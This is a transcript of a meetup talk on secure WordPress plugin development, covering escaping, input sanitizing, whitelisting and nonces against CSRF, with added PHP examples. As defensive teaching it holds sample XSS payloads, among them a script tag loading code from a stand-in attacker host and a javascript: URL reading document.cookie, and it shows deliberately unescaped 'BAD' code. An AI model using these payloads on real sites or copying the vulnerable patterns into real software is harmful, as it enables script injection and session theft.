Secure WordPress Development Practices
I gave this talk at the September OCWP developer meetup.
Transcript of "Secure WordPress Development Practices"

  1. So you’re writing code for the masses, huh? Are you being responsible and protecting them from getting pwned?
  2. Watch This. http://wordpress.tv/2011/01/29/mark-jaquith-theme-plugin-security/
  3. That guy pwned a plugin I wrote live on stage at WordCamp New York. It changed my life.
  4. Read This. http://wp.tutsplus.com/tutorials/creative-coding/data-sanitization-and-validation-with-wordpress/
  5. tl;dr
     • Keep your dev environment clean
     • Escape your data output
     • Sanitize your data inputs
     • Validate referrers
     • Core functionality should always trump your super awesome functionality
  6. Keep Your Dev Environment Clean. Don’t think that just because you’re on a mac you’re safe from viruses. If you’re on a PC, you should assume you’re already pwned.
  7. Kaspersky Anti-Virus
     • I use it.
     • Dre uses it.
     • Tony uses it.
     • You should be using it.
  8. Trust No One, Trust Nothing
  9. XSS: Cross-site Scripting. Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. http://en.wikipedia.org/wiki/Cross-site_scripting
  10. Escape All The Things On Output. http://codex.wordpress.org/Data_Validation#Output_Sanitation
     • Bad data will be tamed
     • esc_{context}: escape at the moment of output, with the function that matches where the data lands
     • esc_js - Escape single quotes, htmlspecialchar " < > &, and fix line endings. Meant for inline JS inside single-quoted string literals.
     • esc_html - Escaping for HTML blocks.
     • esc_attr - Escaping for HTML attributes.
     • esc_sql - Escapes data for use in a MySQL query. For building queries, $wpdb->prepare() with placeholders is the better tool.
     • esc_url - Checks and cleans a URL (disallowed schemes such as javascript: come back as an empty string).
     • esc_textarea - Escaping for textarea values.
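The slide lists one escaping function per output context; the following added example (not from the talk and not WordPress core code) puts them side by side in a plugin fragment, with the unescaped version next to the escaped one. The plugin prefix `escdemo_`, the option name and the attacker-style option values are constructed assumptions; the code is meant to run inside a WordPress install, where the `esc_*` functions and `$wpdb` are defined.

```php
<?php
/*
Plugin Name: Escaping Demo (added example, not part of the talk)
*/

// CONSTRUCTED sample values standing in for admin-entered strings. Each one
// targets a different output context.
function escdemo_get_promo() {
    $defaults = array(
        'title'     => 'Sale! <script>alert(1)</script>',
        'url'       => 'javascript:alert(document.cookie)',
        'note'      => "Line one\n</textarea><script>alert(2)</script>",
        'css_class' => 'promo" onmouseover="alert(3)',
    );
    return wp_parse_args( get_option( 'escdemo_promo', array() ), $defaults );
}

// BAD: raw output. Every value above becomes live HTML or JS.
function escdemo_render_bad() {
    $p = escdemo_get_promo();
    echo '<div class="' . $p['css_class'] . '">';
    echo '<a href="' . $p['url'] . '">' . $p['title'] . '</a>';
    echo '<textarea>' . $p['note'] . '</textarea>';
    echo "<script>var promo = '" . $p['title'] . "';</script>";
    echo '</div>';
}

// GOOD: one escaping function per context, applied at the point of output.
function escdemo_render_good() {
    $p = escdemo_get_promo();
    // esc_attr: inside a quoted attribute, so a stray quote cannot close it.
    echo '<div class="' . esc_attr( $p['css_class'] ) . '">';
    // esc_url: returns '' for javascript: and other non-allowed schemes.
    echo '<a href="' . esc_url( $p['url'] ) . '">' . esc_html( $p['title'] ) . '</a>';
    // esc_textarea: encodes </textarea> so the element cannot be broken out of.
    echo '<textarea>' . esc_textarea( $p['note'] ) . '</textarea>';
    // esc_js: for a single-quoted inline JS string literal (it escapes ' and newlines).
    echo "<script>var promo = '" . esc_js( $p['title'] ) . "';</script>";
    echo '</div>';
}
add_action( 'wp_footer', 'escdemo_render_good' );

// SQL context: esc_sql() only escapes quotes; $wpdb->prepare() binds the
// value to a typed placeholder, which is the form to reach for in queries.
function escdemo_lookup_post_id( $slug ) {
    global $wpdb;
    return $wpdb->get_var( $wpdb->prepare(
        "SELECT ID FROM {$wpdb->posts} WHERE post_name = %s AND post_status = 'publish'",
        $slug
    ) );
}
```

For anything more than a short string that has to reach JavaScript, pass it through `wp_localize_script()` or `wp_json_encode()` instead of building a `<script>` tag by string concatenation; `esc_js()` is only correct for the single-quoted string literal case shown.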
  11. Sanitize All The Things On Input. http://codex.wordpress.org/Data_Validation#Input_Validation
     • sanitize_* and similar functions help for most things
     • $_POST = array( 'e' => '<script src="http://pwnd.com/u.js"></script>' )
     • BAD: update_post_meta( $id, 'e', $_POST['e'] )
     • GOOD: update_post_meta( $id, 'e', sanitize_email( $_POST['e'] ) )
     • Note: sanitizers alter data rather than rejecting it, so they might unintentionally change input and give unexpected results
  12. Whitelisting Data. http://codex.wordpress.org/Data_Validation#Whitelist
     • Whitelisting data - Only accept known data
     • $_POST = array( 'pwn' => '<script src="http://pwnd.com/u.js"></script>', 'e' => 'email@domain.com' );
     • BAD: foreach ( $_POST as $key => $val ) : update_post_meta( $id, $key, $val ); endforeach; (every key the attacker sends becomes a meta entry, including ones your plugin never defined)
     • GOOD: update_post_meta( $id, 'e', sanitize_email( $_POST['e'] ) ) (only the field you expect is read; 'pwn' is never touched)
  13. Blacklisting Data. http://codex.wordpress.org/Data_Validation#Blacklist
     • Blacklisting data - Reject data that matches a list of known-bad values. Weaker than whitelisting, because you have to enumerate every bad input in advance.
     • The check below is really format validation (reject anything that is not a well-formed email), which is the stronger pattern: test the value with is_email() before sanitizing and storing it.
     • $_POST = array( 'e' => 'me@domain.' );
     • if ( is_email( $_POST['e'] ) ) update_post_meta( $id, 'e', sanitize_email( $_POST['e'] ) );
     • 'me@domain.' fails is_email() (trailing dot, empty domain label), so nothing is stored.
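Slides 11 to 13 are three views of one save handler: read only known fields, validate each one's format, then sanitize and store. The following added example (not from the talk and not WordPress core code) combines them in one `save_post` handler. The plugin prefix `secdemo_`, the field names, the meta key prefix, the nonce field name and the sample input array are assumptions constructed for illustration; the code is meant to run inside a WordPress install.

```php
<?php
/*
Plugin Name: Input Handling Demo (added example, not part of the talk)
*/

// Whitelist of accepted POST fields: key => array( validator, sanitizer ).
// Anything not listed here is never read, so the slide's 'pwn' key is ignored.
function secdemo_fields() {
    return array(
        'e'     => array( 'is_email',               'sanitize_email' ),
        'site'  => array( 'secdemo_is_http_url',    'esc_url_raw' ),
        'color' => array( 'secdemo_is_known_color', 'sanitize_key' ),
        'bio'   => array( '__return_true',          'sanitize_text_field' ),
    );
}

// Format validators: they answer yes/no and never modify the value.
function secdemo_is_http_url( $url ) {
    $scheme = parse_url( $url, PHP_URL_SCHEME );
    return in_array( strtolower( (string) $scheme ), array( 'http', 'https' ), true );
}
function secdemo_is_known_color( $c ) {
    return in_array( $c, array( 'red', 'green', 'blue' ), true );
}

// Core logic, separated from $_POST so it can be called with any array and
// inspected. Returns what was stored and what was refused.
function secdemo_process( $post_id, array $input ) {
    $saved    = array();
    $rejected = array();
    foreach ( secdemo_fields() as $key => $rules ) {
        list( $validate, $sanitize ) = $rules;
        if ( ! isset( $input[ $key ] ) ) {
            continue;
        }
        $raw = wp_unslash( $input[ $key ] ); // WordPress adds slashes to $_POST
        // Arrays (e[]=x) and values that fail the format check are refused,
        // not "fixed": a sanitizer would silently turn bad input into something else.
        if ( ! is_string( $raw ) || ! call_user_func( $validate, $raw ) ) {
            $rejected[ $key ] = $raw;
            continue;
        }
        $clean = call_user_func( $sanitize, $raw );
        update_post_meta( $post_id, 'secdemo_' . $key, $clean );
        $saved[ $key ] = $clean;
    }
    return array( 'saved' => $saved, 'rejected' => $rejected );
}

// CONSTRUCTED sample request, modelled on the slides' $_POST arrays.
// Result: 'pwn' is never looked at, 'site' is rejected (javascript: scheme),
// 'e' and 'color' are stored, 'bio' is stored with tags stripped.
function secdemo_sample_input() {
    return array(
        'pwn'   => '<script src="http://pwnd.com/u.js"></script>',
        'e'     => 'email@domain.com',
        'site'  => 'javascript:alert(1)',
        'color' => 'red',
        'bio'   => 'Hello <b>world</b>',
    );
}

function secdemo_save_post( $post_id ) {
    // Request checks come first: the nonce (see the Nonces slide) proves the
    // form came from this site, current_user_can() proves the user may edit.
    $nonce = isset( $_POST['secdemo_nonce'] ) ? $_POST['secdemo_nonce'] : '';
    if ( ! wp_verify_nonce( $nonce, 'secdemo_save_' . $post_id ) ) {
        return;
    }
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    secdemo_process( $post_id, $_POST );
}
add_action( 'save_post', 'secdemo_save_post' );
```

The validator/sanitizer pairing is the point: `is_email()` decides whether the value is acceptable at all, and only then does `sanitize_email()` normalise it. Running the sanitizer alone on `me@domain.` would store a mangled address instead of telling the user the input was wrong.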
  14. CSRF: Cross-site Request Forgery. Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. http://en.wikipedia.org/wiki/Cross-site_request_forgery
  15. Sweet, this might lead to my next big deal! ACCEPT!
  16. zOMG WTF?! http://mysite.com/wp-admin/post.php?post=307&action=trash
  17. Nonces FTW! (http://codex.wordpress.org/WordPress_Nonces)
     • Before the Request
       • wp_nonce_url
       • wp_create_nonce
       • wp_nonce_field
     • Verify the Request
       • wp_verify_nonce
       • check_admin_referer
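Slides 14 to 17 describe the attack (a logged-in admin follows a link that trashes post 307) and the fix (nonces). The following added example (not from the talk and not WordPress core code) shows both halves of the nonce flow for a link and for a form, plus the capability check that a nonce does not replace. The plugin prefix `nonce_demo_`, the action names, the option name and the capabilities are assumptions for illustration; the code is meant to run inside a WordPress install.

```php
<?php
/*
Plugin Name: Nonce Demo (added example, not part of the talk)
*/

// 1. Before the request: mint the nonce into the link.
// The action string includes the item id, so a nonce minted for item 5
// cannot be replayed against item 6.
function nonce_demo_trash_link( $item_id ) {
    $item_id = absint( $item_id );
    $url = add_query_arg( array(
        'action' => 'nonce_demo_trash',
        'item'   => $item_id,
    ), admin_url( 'admin-post.php' ) );
    return wp_nonce_url( $url, 'nonce_demo_trash_' . $item_id ); // appends _wpnonce=...
}

// 1b. Before the request: mint the nonce into a form as a hidden field.
function nonce_demo_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="nonce_demo_save">';
    wp_nonce_field( 'nonce_demo_save', 'nonce_demo_nonce' );
    echo '<input type="text" name="greeting"><button>Save</button></form>';
}

// 2. Verify the request. check_admin_referer() reads _wpnonce from the
// request and wp_die()s with "Are you sure?" if it is missing or stale.
// A valid nonce only proves the request originated from a page WordPress
// rendered for this user; whether the user may trash things is a separate
// question, so current_user_can() is checked as well.
function nonce_demo_handle_trash() {
    $item_id = isset( $_GET['item'] ) ? absint( $_GET['item'] ) : 0;
    check_admin_referer( 'nonce_demo_trash_' . $item_id );
    if ( ! current_user_can( 'delete_post', $item_id ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    wp_trash_post( $item_id );
    $back = wp_get_referer();
    wp_safe_redirect( $back ? $back : admin_url() );
    exit;
}
add_action( 'admin_post_nonce_demo_trash', 'nonce_demo_handle_trash' );

// Same check with wp_verify_nonce(), the non-dying variant, for the form.
function nonce_demo_handle_save() {
    $nonce = isset( $_POST['nonce_demo_nonce'] ) ? $_POST['nonce_demo_nonce'] : '';
    if ( ! wp_verify_nonce( $nonce, 'nonce_demo_save' ) || ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Request check failed', '', array( 'response' => 403 ) );
    }
    $greeting = isset( $_POST['greeting'] ) ? wp_unslash( $_POST['greeting'] ) : '';
    update_option( 'nonce_demo_greeting', sanitize_text_field( $greeting ) );
    $back = wp_get_referer();
    wp_safe_redirect( $back ? $back : admin_url() );
    exit;
}
add_action( 'admin_post_nonce_demo_save', 'nonce_demo_handle_save' );
```

The same pattern applies to admin-ajax handlers with `check_ajax_referer()`. WordPress nonces are tied to the user and the action and expire after a day, so they stop the slide 16 link from working when an attacker plants it, but they are not authorization tokens: leave out the `current_user_can()` check and any logged-in subscriber who can obtain a nonce can trash the post.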
  18. Is there an API for that?
  19. Professional WordPress Plugin Development. http://amzn.to/plugindevbook